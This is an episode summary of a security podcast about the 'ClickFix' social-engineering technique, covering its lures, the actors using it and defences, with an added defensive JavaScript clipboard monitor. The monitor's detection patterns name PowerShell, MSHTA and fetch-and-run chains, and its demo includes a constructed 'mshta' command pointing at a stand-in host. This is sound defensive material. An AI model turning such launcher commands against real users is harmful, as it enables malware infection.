The Defender's Advantage Podcast
Episode Summary: The Rise of ClickFix
Host: Luke McNamara (Google Threat Intelligence Group)
Guest: Dima Lentz (Security Engineer, Google Threat Intelligence Group)
Date: July 15, 2025
Episode Overview
This episode focuses on the emerging “ClickFix” technique in cyberattacks—a growing, human-centric social engineering approach that leverages fake problem prompts (like captchas, expired certificates, or security warnings) to trick users into running malicious commands on their systems. The discussion covers its evolution across cybercrime and nation-state actors, technical and human factors making ClickFix attractive, notable campaigns, defenses organizations might consider, and predictions about the technique’s future development.
Key Discussion Points & Insights
1. Defining ClickFix (01:35)
- ClickFix is a social engineering method where users are convinced—via deceptive prompts—to copy and run malicious commands, initiating an infection chain.
- Commands often masquerade as solutions to common computer issues (e.g., “fixing” DNS problems, resolving expired certificates, or enabling site access).
- While not brand new, activity spiked around August 2024, with prevalence continuing to increase.
Quote:
“ClickFix is a social engineering technique that tries to convince a user into copying and running a malicious command on their systems, which in turn will lead to the infection chain and run a certain malware...”
— Dima Lentz (01:35)
2. Why Threat Actors Favor ClickFix (04:01)
- Lower Barriers & High Success:
- Unlike technical exploits (like zero-days), ClickFix is comparatively simple to deploy.
- Leverages user trust—no pop-up warnings or antivirus blocks since the user runs native, often legitimate administrative tools (e.g., PowerShell, MSHTA).
- The commands often have minimal footprint and evade traditional defenses.
Quote:
“The whole idea of ClickFix is lucrative to threat actors... on the social engineering side... the trust is higher... There are no SmartScreen notifications, there is no warning... On the technical side... antiviruses, web browser security features... would not react to something like this.”
— Dima Lentz (04:01)
3. Behavioral Engineering & MFA Fatigue Comparison (06:39)
- ClickFix exploits behavioral patterns—users are habituated to deal with frequent captchas and browser issues.
- The attack bears resemblance to MFA fatigue attacks: repeated prompts lower user skepticism, leading to compliance.
4. Spectrum of Adopters: From Cybercrime to Espionage (08:07)
- Cybercrime Origin: Initially popular for malware (especially info-stealers) distribution among financially-motivated actors.
- Espionage Uptake: Increasingly seen in state-sponsored campaigns against NGOs, governments—often with more targeted “document access” or device validation lures.
Ecosystem Evolution Example:
- ANK5142: Transitioned from fake browser update pop-ups to ClickFix for distributing multi-stage malware like “Clear Shot,” commonly targeting credentials.
- ANK5692 & Others: Used similar tricks to deploy loaders and initial-access tools, sometimes shifting toward info-stealers as payloads.
- APT33: Used ClickFix in targeted attacks disguised as document access checks (e.g., fake registration steps for PDF access).
5. Technical Delivery & Variants (10:53 | 11:03)
- Compromised Legitimate Sites: Most effective—users trust familiar sites, making fake overlays more convincing.
- Targeted Emails/Spam: In espionage, users receive targeted lures tied to document access or identity verification.
6. Campaign Examples & Ingenious Lures (12:58 | 13:13)
- Template Diversity: Adversaries rapidly iterate fake prompts—Defender (Windows security) alerts (complete with sounds), various business productivity brands, etc.
- Dynamic Trust Signals: Customization for operating systems—bash scripts for macOS users, details like use of legitimate notification sounds.
Quote:
“One of the recent campaigns... was faking Defender Alert, including the audio notification... This Defender notification would ask to run certain commands... which in fact will start the infection.”
— Dima Lentz (13:13)
7. Defensive Measures: Limitations and Recommendations (15:54)
- Technical Barriers:
- PowerShell restrictions and script-signing requirements are largely ineffective, because users manually run benign-appearing commands themselves.
- Advanced lockdowns (limiting PowerShell itself) are often impractical for business environments.
- Possible detection avenue: monitoring JavaScript clipboard write events (execCommand("copy") or navigator.clipboard.writeText), though adversaries may quickly adjust if this becomes widespread.
- User Awareness is Critical:
- Continuous security awareness training: educate about novel lures beyond traditional phishing.
- Highlight that user-initiated command execution—even when prompted by trusted-looking sources—should be scrutinized.
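As an added example (not code from the podcast or from Google Threat Intelligence Group), here is a browser-side monitor for the clipboard-write detection avenue mentioned above: it wraps navigator.clipboard.writeText and document.execCommand("copy") and flags copied text that matches PowerShell/MSHTA-style launcher heuristics. The deployment (an extension content script), the heuristic patterns, and the fake window object used in demo() are assumptions.

```javascript
// Added example, not from the podcast: observe clipboard writes made by page
// JavaScript and flag text that looks like a ClickFix command. Assumed to run
// as an extension content script; the heuristics are illustrative only.
const SUSPICIOUS_PATTERNS = [
  /\bpowershell(\.exe)?\b/i,                                   // PowerShell host
  /\bmshta(\.exe)?\b/i,                                        // HTML application host
  /\b(iex|invoke-expression)\b/i,                              // evaluate downloaded text
  /\b(iwr|invoke-webrequest|curl|wget)\b.*\b(iex|sh|bash)\b/i, // fetch-and-run chain
  /-(enc|encodedcommand)\b/i,                                  // encoded command argument
];
// Returns indexes of matching patterns; an empty array means "looks benign".
function classifyClipboardText(text) {
  const hits = [];
  SUSPICIOUS_PATTERNS.forEach((re, i) => { if (re.test(text)) hits.push(i); });
  return hits;
}
// Wraps the clipboard APIs on a window-like object. Writes are observed and
// reported, never blocked, so legitimate copy buttons keep working.
function installClipboardMonitor(win, report) {
  const events = [];
  const sink = report || ((e) => events.push(e));
  const record = (api, text) => sink({ api, hits: classifyClipboardText(text), sample: text.slice(0, 120) });
  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === "function") {
    const original = clip.writeText.bind(clip);
    clip.writeText = (text) => { record("navigator.clipboard.writeText", String(text)); return original(text); };
  }
  const doc = win.document;
  if (doc && typeof doc.execCommand === "function") {
    const originalExec = doc.execCommand.bind(doc);
    doc.execCommand = (cmd, ...rest) => {
      if (String(cmd).toLowerCase() === "copy") record('execCommand("copy")', doc.getSelection ? String(doc.getSelection()) : "");
      return originalExec(cmd, ...rest);
    };
  }
  return events; // the log used when no report callback was supplied
}
// Stand-alone demo on a constructed fake window; returns one entry per write.
function demo() {
  const fakeWin = { navigator: { clipboard: { writeText: async (t) => t } },
                    document: { execCommand: () => true, getSelection: () => "hello world" } };
  const log = installClipboardMonitor(fakeWin);
  fakeWin.navigator.clipboard.writeText("mshta https://example.invalid/verify"); // constructed sample
  fakeWin.document.execCommand("copy");
  return log.map((e) => ({ api: e.api, suspicious: e.hits.length > 0 }));
}
```

In a real deployment the report callback would forward events to an endpoint or the extension background page; the heuristics will need tuning as kits move to images and heavier obfuscation, as the episode notes.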
Quote:
“Ongoing security awareness training is essential here because the novelty of this attack is something which I think makes it so successful.”
— Dima Lentz (17:56)
8. Technique Evolution & Future Outlook (18:46)
- Platform Expansion: Initially Windows-focused; now seeing bash scripts for macOS—Linux may be next.
- Obfuscation & Evasion: Kits becoming visually dynamic, using images instead of text to evade detection, greater obfuscation in core mechanisms.
- Example: Cold Reaver replaced on-screen command prompts with images, defeating some signature-based detections.
- Telemetry and Feedback Loops: Attackers increasingly gather data from victims’ browsers to refine tactics, e.g., Cloudflare-branded kits using Telegram APIs for feedback and monitoring.
- Broader Brand Abuse: Attackers likely to branch into other trusted services (e.g., GitHub, YouTube).
Quote:
“I think that will be one avenue where threat actors will potentially experiment with more platforms... We see already that kits become more dynamic and visually appealing, which also increases trust and contributes to their success...”
— Dima Lentz (18:46)
Notable Quotes & Memorable Moments
- On user conditioning:
“People are used to it, to be honest, so when they see this new type of captcha they’re not surprised... willing to follow the instructions.”
— Dima Lentz (04:01)
- On campaign creativity:
“This experimenting with new avenues, how to infect, how to approach users is particularly interesting and I think the trend will continue. So more and more brandings... will be faked in this regard.”
— Dima Lentz (13:13)
- Prediction:
“Clearly the success of this will likely drive or shape future actor investments and resources into continuing to experiment with what is the most successful way to socially engineer the end user.”
— Luke McNamara (22:29)
Key Timestamps
- 01:35 — What is ClickFix?
- 04:01 — Why it’s appealing to threat actors
- 08:07 — Who’s using ClickFix: crime and espionage
- 10:53–11:03 — Infection chain: Initial triggers and delivery mechanisms
- 12:58 — Notable campaigns and templates
- 13:13 — Defender Alert audio deception and campaign iteration
- 15:54 — Defenses and user awareness strategies
- 18:46 — Future predictions & technique evolution
Summary Takeaways
- ClickFix leverages the user’s trust and computer habits, making infection chains both simple and effective for a variety of threat actors.
- Adversaries are rapidly experimenting with prompts, brands, and delivery platforms while putting effort into evasion and feedback loops.
- Technical controls have limited value; continual user education and adaptive monitoring of web/script behaviors are essential.
- The threat is evolving—expect further adoption, diversification, and technical sophistication as attackers refine this low-signature, high-success approach.
For organizations:
Prioritize user education around new lures, and consider supplementing technical monitoring to flag suspicious clipboard or command behaviors initiated through browsers.
For defenders:
Stay alert to evolving ClickFix techniques, as adversaries are quick to adapt visuals, delivery mechanisms, and social engineering tricks to stay ahead.
